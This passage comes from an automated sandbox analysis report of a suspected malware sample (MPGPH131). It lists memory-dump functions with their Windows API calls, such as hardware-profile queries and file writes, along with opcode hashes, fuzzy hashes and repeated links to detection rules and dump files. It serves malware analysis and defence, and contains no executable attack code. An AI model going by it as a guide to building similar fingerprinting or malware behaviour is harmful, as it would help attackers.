Instruction Fuzzy Hash: 9541E2EB70C114BDF96286451B50AF656EDE7C67307B0A066F907D52C2F3E42E8570B1

Function 04E907D7 Relevance: 1.7, APIs: 1, Instructions: 202COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: adbae7a114d1c64b55b9a678503b66819f5591f02ecbbbfffaf2ebe55914463f
Instruction ID: 35c2fbf04c9ea9afa997a718f902d567360653d9cec582307a72b8ff97accfcc
Opcode Fuzzy Hash: adbae7a114d1c64b55b9a678503b66819f5591f02ecbbbfffaf2ebe55914463f
Instruction Fuzzy Hash: 3041E1EB70C120ADFD6286461B50AFA56EDE7C67307B0A066F907D52C2F3E42E8570B1

Function 04E907FB Relevance: 1.7, APIs: 1, Instructions: 201COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: c3d5d050a8a5c4991a3343d8160eff9245c64a278593add66356e07f8b7aec56
Instruction ID: 46c16ed29eaf34db970f0b9983f3054123c5562baae1861b2b5a42369ad6e120
Opcode Fuzzy Hash: c3d5d050a8a5c4991a3343d8160eff9245c64a278593add66356e07f8b7aec56
Instruction Fuzzy Hash: 1241E4AB70D110ADFA5286451B50AFA67EDE7C67307B0A06AF907D62C2F3D42E8560B1

Function 003F2B5C Relevance: 1.7, APIs: 1, Instructions: 198fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000000,003E6747,?,00000000,00000000,00000000,?,00000000,?,003DBC71,003E6747,00000000,003DBC71,?,?), ref: 003F2CE1

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 186e3d9af48edecac606489e1ed463ddcf0bcaa61d439faa86b67f361818f064
Instruction ID: 25cedc80f04d19357b19547b4af0cd650e20d775b4d325f670d6ba61251a9bb7
Opcode Fuzzy Hash: 186e3d9af48edecac606489e1ed463ddcf0bcaa61d439faa86b67f361818f064
Instruction Fuzzy Hash: E761BDB190411DEEDF12DFA8C884EFFBFB9AF09304F150155EA10AB256D776D9019BA0

Function 04E9086C Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: dc497e6af9b87729d213b95b3009db028262cb8000489642070ad585987bf5ce
Instruction ID: 060244cdba111f91126cfed967f52e1b122aca9655196043ebe2266e852a122b
Opcode Fuzzy Hash: dc497e6af9b87729d213b95b3009db028262cb8000489642070ad585987bf5ce
Instruction Fuzzy Hash: 4741E2FB70C120ADFA6286451B10AFA67EDE7C67307B0A066F907D56C2F3942E8560B1

Function 04E9081B Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: ce1767742bc027d0bf33a2fa9ed4e410d4af8065427e5745129eb350923426da
Instruction ID: 5ce72b87a4dd110e7d3b8f4b447f1a86bf195c6d16ac443171ac46a29a97a3da
Opcode Fuzzy Hash: ce1767742bc027d0bf33a2fa9ed4e410d4af8065427e5745129eb350923426da
Instruction Fuzzy Hash: 774103BB70D110ADF96286451B10AF667EDE7C67307B0A06AF907D52C2F3E42E8570B1

Function 04E907CA Relevance: 1.7, APIs: 1, Instructions: 188COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 50e35354cebd95ad7a175a6696430d9f59884167299b5be2b07ee2895ef6c263
Instruction ID: c8ce51cd881a580cb343516bf4684ae353b75e72c40142184f7678722a20bc47
Opcode Fuzzy Hash: 50e35354cebd95ad7a175a6696430d9f59884167299b5be2b07ee2895ef6c263
Instruction Fuzzy Hash: 1C41D2EB70C124ADF96286451B10AFA66EDE7C77307B0A066F907D56C2F3E42E8570B1

Function 04E90844 Relevance: 1.7, APIs: 1, Instructions: 183COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: f8f440e2f1a16db9a725324876468b524040a77ded17364d1df2b7186f570a4d
Instruction ID: e0462f8d5b602f2a9529f30e6b73ca0c6796159e199aae597c92bc8a0832417d
Opcode Fuzzy Hash: f8f440e2f1a16db9a725324876468b524040a77ded17364d1df2b7186f570a4d
Instruction Fuzzy Hash: 9D31D2EB70C110ADFA5282451B50AF657EEE7C77307B0A06AF907D56C2F3D42E8961B2

Function 04E90879 Relevance: 1.7, APIs: 1, Instructions: 180COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 8ed4540591ed776bd0c96bdfa57ee9ee44f223f4e088e529bb64769c21339810
Instruction ID: d3c6128b1b22518f7ee429dbf4f41021fdfe097217a9b655cffb72e35795e41f
Opcode Fuzzy Hash: 8ed4540591ed776bd0c96bdfa57ee9ee44f223f4e088e529bb64769c21339810
Instruction Fuzzy Hash: 183123EB30C110ADF95286411B10AF667EDE7C67307B0A02AF907D62C1F3D42E8570B1

Function 04E9085D Relevance: 1.7, APIs: 1, Instructions: 178COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 854bf3722356dbe0acf605f0fb7db8010ac7a5325cea143bfc49d4428bf4e005
Instruction ID: 4f3213c5527bffc82da4f8a9916e024d181edaf9d9433bc1e05e77a122fdeccd
Opcode Fuzzy Hash: 854bf3722356dbe0acf605f0fb7db8010ac7a5325cea143bfc49d4428bf4e005
Instruction Fuzzy Hash: B131C2EB70C120ADF95286451B50AF656EEE7C77307B0A02AB907D56C2F3D42E8570B2

Function 0036B6B0 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0036B801

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
Instruction ID: ea656757d3a7544289a05b87099e9647513226a71083034232933395523a3f36
Opcode Fuzzy Hash: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
Instruction Fuzzy Hash: CE4138739001159BCB17EF68DC8066EBBA9EF84350F15426AF805EB346D730EE518BE1

Function 003F21D2 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,003F20B9,00000000,CF830579,00431090,0000000C,003F2175,003E627D,?), ref: 003F2228

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2fb7e1e4a8c28228bee443ad3b393b9e31efea577710e0c56d5ff1e3781a26bd
Instruction ID: 3464b3945a8dddda036b565e8c2faaa502f9e8a86a86ff443cb4258c820491fa
Opcode Fuzzy Hash: 2fb7e1e4a8c28228bee443ad3b393b9e31efea577710e0c56d5ff1e3781a26bd
Instruction Fuzzy Hash: 2D11263360922CA6D6272274AC81B7F6B898F82734F770629FB189F1D2DA71AC415195

Function 003EB71C Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00430D48,003DBC71,00000002,003DBC71,00000000,?,?,?,003EB826,00000000,?,003DBC71,00000002,00430D48), ref: 003EB758

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0362a01eaa0bd14c68309f1e59f4d0d9492629f11a3d97d1e809e37101817659
Instruction ID: f6c39c8d6866f0c5a7b7ed55519eee1f2cd094342b6cf8cdf434ff6212963403
Opcode Fuzzy Hash: 0362a01eaa0bd14c68309f1e59f4d0d9492629f11a3d97d1e809e37101817659
Instruction Fuzzy Hash: B9010432610165ABCF079F5ACC418AE7B6ADFC1320B250308F8519B6D0EA71ED419B90

Function 003DC950 Relevance: 1.6, APIs: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00301FDE

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: e4d0ae6aafb240b0b1d62e74c63eba1a2e240b5fb27b185dc81b8cce21acf58c
Instruction ID: 888deaddd1599a7eec76a846bd8bd0f658a924b08e7ef8ad274dbde810d19fc8
Opcode Fuzzy Hash: e4d0ae6aafb240b0b1d62e74c63eba1a2e240b5fb27b185dc81b8cce21acf58c
Instruction Fuzzy Hash: 07014E3641030EA7CB17ABA4FC1154A779C9E02360B508333F508AE6D1FB70E954C7D4

Function 003F3AB3 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,003DADBC,?,?,003F3439,00000001,00000364,?,00000006,000000FF,?,003DDD3B,?,?,?,?), ref: 003F3AF4

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3e92bccb57419de7686c8952aada4fcaf445c2f4eed7ce244d06842b3cfde3b2
Instruction ID: e282200b270c2c6dcec7e25a01c090cb16339d898a618a19f2c7d2a5d83541d1
Opcode Fuzzy Hash: 3e92bccb57419de7686c8952aada4fcaf445c2f4eed7ce244d06842b3cfde3b2
Instruction Fuzzy Hash: 6EF0E03260952C66DF136A278C11B7B3B489F41760B164111EE449A1D4CB21DE0081E5

Function 003F44ED Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,003DDD3B,?,?,?,?,?,00302D8D,003DADBC,?,?,003DADBC), ref: 003F4520

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 48bbdbba7a1362da4fdd152043ef7dda22bb3a28d4d0da1928596669ed205972
Instruction ID: f2b67d1a62386c44c578e7823dc5d8404d0a8f6049834e268de7125030f2c91f
Opcode Fuzzy Hash: 48bbdbba7a1362da4fdd152043ef7dda22bb3a28d4d0da1928596669ed205972
Instruction Fuzzy Hash: C3E09B3110162D57D6233A655C0177B3A8DDF833B1F160121EF4C9A1D1DB50DE0041E5

Non-executed Functions

Function 0036AB20 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0036AB43
std::_Lockit::_Lockit.LIBCPMT ref: 0036AB65
std::_Lockit::~_Lockit.LIBCPMT ref: 0036AB85
std::_Lockit::~_Lockit.LIBCPMT ref: 0036ABAF
std::_Lockit::_Lockit.LIBCPMT ref: 0036AC1D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0036AC69
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0036AC83
std::_Lockit::~_Lockit.LIBCPMT ref: 0036AD18
std::_Facet_Register.LIBCPMT ref: 0036AD25

Strings

bad locale name, xrefs: 0036AD3F

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: 12b3f523608795b329e3739ccb8fa136d4f59c13fc9856968535082e6fd5af66
Instruction ID: 8ed83c4bf32e4a088e00ef6afd7357ab54a73a4cc0887222c61e80e59981a903
Opcode Fuzzy Hash: 12b3f523608795b329e3739ccb8fa136d4f59c13fc9856968535082e6fd5af66
Instruction Fuzzy Hash: A4616DB1D00654EBDF12DFA4E845B9EBBB4AF05350F158069E805BB385EB34E905CB92

Function 00303770 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 003037E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00303835
__Getctype.LIBCPMT ref: 0030384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0030386A
std::_Lockit::~_Lockit.LIBCPMT ref: 003038FF

Strings

bad locale name, xrefs: 0030391C
0:0, xrefs: 00303848

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

